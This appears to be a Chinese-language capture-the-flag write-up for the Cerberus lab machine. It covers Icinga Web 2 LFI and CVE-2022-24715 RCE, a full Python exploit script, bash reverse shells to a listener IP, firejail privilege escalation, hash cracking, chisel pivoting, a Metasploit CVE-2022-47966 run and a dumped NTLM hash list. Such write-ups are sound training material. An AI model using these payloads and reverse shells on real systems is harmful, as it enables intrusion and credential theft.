基本信息

端口扫描

就一个8080:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ nmap -sC -sV -Pn 10.10.11.205
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 09:49 CST
Nmap scan report for 10.10.11.205
Host is up (0.091s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.52 seconds

8080

需要加hosts,icingaweb2:

1
10.10.11.205  icinga.cerberus.local

icingaweb2

可以搜到相关漏洞:

LFI

首先是LFI读文件:

根据文档读一些配置文件,得到账号密码:

1
2
matthew
IcingaWebPassword2023

web

得到的账号密码可以登录web:

CVE-2022-24715

然后就是登录后利用CVE-2022-24715,就是根据sonar博客里的步骤:

  1. 创建一个ssh密钥对:
1
ssh-keygen -t rsa -m PEM

  1. 在 icingaweb 中创建一个新的 SSH 资源

    配置 -> 资源 -> 创建新资源

    1
    2
    3
    Resource Name: ssh-user
    User: ssh-user
    Private Key: <Your generated Key>

  2. 创建一个新资源执行php代码

    1
    2
    3
    Resource Name: SHELL
    User: ../../../../../dev/shm/run.php
    Private Key: file:///etc/icingaweb2/ssh/ssh-user%00 <?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'");

  3. 转到Configuration -> Application并更改 Module Path 以包含 /dev/

    1
    WHATEVER:/dev/

  4. 转到Configuration -> Modules并启用shm, 触发执行得到shell

Discord里也给出了一个自动化脚本:

1
python3 icingaweb2.py -i 10.10.14.2 -p 4444

得到的是容器的www-data:

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
import requests
import bs4
import argparse
import random
import string

def get_csrf(resp):
    soup = bs4.BeautifulSoup(resp.text, "lxml")
    csrf_token = soup.find("input", {"id": "CSRFToken"})["value"]
    return csrf_token


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='lol')
    parser.add_argument('-i', '--ip', help='nc listener ip', required=True)
    parser.add_argument('-p', '--port', help='nc listener port', required=True)

    args = parser.parse_args()

    session = requests.session()

    # LOGIN
    URL = "http://icinga.cerberus.local:8080/icingaweb2/authentication/login"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = {"username":"matthew","password":"IcingaWebPassword2023","rememberme":"0","redirect":"","formUID":"form_login","CSRFToken":csrf_token,"btn_submit":"Login"}
    resp = session.post(URL, data=data)

    # CHANGE MODULE PATH
    URL = "http://icinga.cerberus.local:8080/icingaweb2/config/general"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = {"global_show_stacktraces":"0","global_show_stacktraces":"1","global_show_application_state_messages":"0","global_show_application_state_messages":"1","global_module_path":"/dev/","global_config_resource":"icingaweb2","logging_log":"syslog","logging_level":"ERROR","logging_application":"icingaweb2","logging_facility":"user","themes_default":"Icinga","themes_disabled":"0","authentication_default_domain":"","formUID":"form_config_general","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
    resp = session.post(URL, data=data)

    # ENABLE MODULE
    URL = "http://icinga.cerberus.local:8080/icingaweb2/config/moduleenable"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = {"identifier":"shm","CSRFToken":csrf_token,"btn_submit":"btn_submit"}
    resp = session.post(URL, data=data)

    # UPLOAD SSH KEY
    URL = "http://icinga.cerberus.local:8080/icingaweb2/config/createresource"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = {"type":"ssh","name":"test","user":"test","private_key":"-----BEGIN RSA PRIVATE KEY-----\r\n\
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\r\n\
-----END RSA PRIVATE KEY-----","formUID":"form_config_resource","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
    resp = session.post(URL, data=data)

    # EXPLOIT: WRITE PHP FILE
    URL = "http://icinga.cerberus.local:8080/icingaweb2/config/createresource"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = {"type":"ssh","name":"asdf2","user":"../../../../../dev/shm/run.php","private_key":"file:///etc/icingaweb2/ssh/test\x00<?php system($_REQUEST['cmd']);?>","formUID":"form_config_resource","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
    resp = session.post(URL, data=data)

    # GET REVERSE SHELL
    URL = "http://icinga.cerberus.local:8080/icingaweb2/shm/run"
    data = {"cmd":"bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(args.ip,args.port)}
    session.post(URL, data=data)

容器

简单枚举发现firejail有suid:

1
2
3
find / -perm -u=s -type f 2>/dev/null

/usr/bin/firejail

搜索发现相关漏洞:

容器提权

给有poc:

需要两个shell,一个运行firejoin.py,另一个join:

1
2
3
4
5
6
7
wget 10.10.14.2:7777/firejoin.py

python3 firejoin.py

firejail --join=1792
# 给出的sudo不行,但可以直接su了
su -

信息

检查相关配置文件以及查看相关数据文件:

1
2
3
4
5
6
root@icinga:/var/lib/sss/db# strings cache_cerberus.local.ldb

name=matthew@cerberus.local,cn=users,cn=cerberus.local,cn=sysdb

cachedPassword
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0

得到的hash破解出来密码:

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

147258369

user flag

根据容器ip可以猜测172.16.22.1是宿主机,内部进行扫描,转发端口:

1
2
3
4
5
./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse

wget http://10.10.14.2:7777/chisel_1.7.6_linux_amd64
chmod +x chisel_1.7.6_linux_amd64
./chisel_1.7.6_linux_amd64 client 10.10.14.2:9999 R:5985:172.16.22.1:5985

然后连接,桌面得到user flag:

1
evil-winrm  -u 'matthew' -p '147258369' -i 127.0.0.1

提权信息

常规枚举发现ManageEngine ADSelfService Plus

CVE-2022-47966

搜索得到相关的比较新的漏洞:

proxy

要利用这个漏洞,需要知道一些必要信息,所以还是要先打通代理:

1
2
3
*Evil-WinRM* PS C:\windows\tasks> upload /Users/miao/Tools/Offsec/chisel.exe C:\windows\tasks

.\chisel.exe client 10.10.14.2:9999 R:1080:socks

然后可以通过代理扫描宿主机:

1
2
3
4
5
6
7
8
9
10
proxychains4 -q nmap -v -Pn -sV -sC -p- 172.16.22.1

Scanning 172.16.22.1 [65535 ports]
Discovered open port 53/tcp on 172.16.22.1
Discovered open port 139/tcp on 172.16.22.1
Discovered open port 135/tcp on 172.16.22.1
Discovered open port 445/tcp on 172.16.22.1
Discovered open port 8888/tcp on 172.16.22.1
Discovered open port 443/tcp on 172.16.22.1
Discovered open port 80/tcp on 172.16.22.1

访问8888会自动重定向到9251,并且需要加hosts:

1
172.16.22.1 dc.cerberus.local dc

用我们的matthew账号登录无权限,但已经能够得到所需的GUID了:

1
67a8d101690402dc6a6744b8fc8a7ca1acf88b2f

检查burp流量也能发现一个对一个xml的请求,其中可以得到需要的issuer信息:

1
2
3
https://dc.cerberus.local/FederationMetadata/2007-06/FederationMetadata.xml

https://dc.cerberus.local/adfs/services/trust

exploit & root flag

metasploit有对应模块,直接用方便点:

1
2
3
4
5
6
7
8
9
10
11
12
13
proxychains4 -q msfconsole

use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
set GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
set ISSUER_URL http://dc.cerberus.local/adfs/services/trust
set RHOSTS 172.16.22.1
set LHOST 10.10.14.2

# 坑,还是要手动指定一下
set Proxies socks5:127.0.0.1:1080
set ReverseAllowProxy true

exploit

root flag

hashdump

需要64位shell,默认选项是32位的:

1
2
3
4
5
6
7
8
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a89ac8a8b099a7578cd9698578d01fd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d2e82d4f77310a49973793ee986b6490:::
matthew:1104:aad3b435b51404eeaad3b435b51404ee:bcd285980e1d9b302e16875844ef6977:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:de7392b6e8a9ce8d34209a3838249903:::
adfs_svc$:5602:aad3b435b51404eeaad3b435b51404ee:d711db215c7eb570d41acc0cac98da96:::
ICINGA$:9102:aad3b435b51404eeaad3b435b51404ee:af70cf6b33f1cce788138d459f676faf:::

参考资料